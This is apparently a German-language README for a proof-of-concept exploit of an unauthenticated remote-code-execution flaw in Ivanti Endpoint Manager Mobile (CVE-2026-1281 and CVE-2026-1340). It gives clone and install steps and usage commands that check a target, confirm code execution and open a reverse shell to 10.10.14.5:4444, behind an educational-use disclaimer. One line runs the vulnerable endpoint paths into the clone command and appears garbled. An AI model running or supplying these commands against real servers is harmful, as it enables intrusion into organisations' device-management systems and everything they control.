
Proof of Concept für CVE-2026-1281 & CVE-2026-1340 – Ivanti EPMM Pre-Auth RCE über Bash-Arithmetik-Erweiterung
⚠️ HAFTUNGSAUSSCHLUSS: Dieser PoC dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die Nutzung ohne ausdrückliche Genehmigung ist illegal.
Vollständiger Proof of Concept (PoC) für die Ausnutzung der Schwachstellen CVE-2026-1281 und CVE-2026-1340, die Ivanti Endpoint Manager Mobile (EPMM) betreffen. Diese Schwachstellen ermöglichen die Ausführung beliebigen Codes aus der Ferne (RCE) ohne Authentifizierung über einen Mechanismus der Bash-Arithmetik-Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Schwachstellentest
python3 exploit.py -t https://target.com -c
# RCE-Validierung
python3 exploit.py -t https://target.com --test-rce
# Reverse Shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe Datei LICENSE für weitere Details.